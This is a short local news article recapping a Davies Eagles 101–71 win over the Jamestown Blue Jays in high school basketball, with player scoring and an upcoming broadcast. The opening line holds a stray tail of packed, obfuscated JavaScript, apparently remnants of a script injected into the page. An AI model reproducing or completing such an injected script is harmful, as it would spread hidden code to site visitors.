JAMESTOWN reyek|var|u0026u|referrer|saekk||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- The Davies Eagles proved why they are on the short-list of teams that people around the state are picking to win the state championship in 2014, as they took care of the Jamestown Blue Jays 101-71 on Saturday night at Jerry Meyer Arena. Davies is ranked No. 2 in Class A behind their duo of Andrew Kozlowski and Tanner Kretchman who scored 34 and 26 respectively against the Jays.
Davies started quick and never really looked back. They opened the game on a 16-2 run and never trailed. Midway through the first half, Jamestown rallied back from a 20-point deficit to get within seven when Tyler Ukestad finished a three-point play. That would be as close as the Jays would get the rest of the way.
Kretchman buried five threes including two to open the second half that were shot from just outside of Pingree. Kozlowski finished one assist shy of a triple-double.
Three Jays ended with 17 points; Marc Wagner, Nick Fuchs and Ashton Johnson. Johnson is averaging 18.5 points per game in the first two contests.
Jays are on the road at Minot on Tuesday, you can hear that game on 1400/97.1 KQDJ and online at NewsDakota.com.
